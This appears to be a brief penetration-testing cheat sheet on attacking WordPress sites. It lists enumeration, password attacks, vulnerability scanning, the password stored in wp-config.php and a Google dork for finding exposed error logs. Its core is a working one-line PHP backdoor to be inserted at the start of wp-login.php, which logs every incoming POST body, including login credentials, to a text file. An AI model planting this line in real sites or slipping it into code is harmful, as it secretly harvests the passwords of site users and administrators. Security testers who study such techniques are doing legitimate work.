WordPress
Last updated
Was this helpful?
Last updated
Was this helpful?
Enumerate directories, users
Password attacks
Scan for vulns in core, plugins, themes
wp-config.php: Has password
This attack needs backdoor access. In htdocs, edit the wp-login.php file with a new line added to the start of the file: <?php file_put_contents('log.txt', file_get_contents('php://input'));?>
This will capture all incoming POSTs and save them into a txt file in the htdocs folder. We would then see captured input in the file when people login or do other interesting POST activity.
Google Dork for vuln versions. Example: "error_log" inurl:/wp-content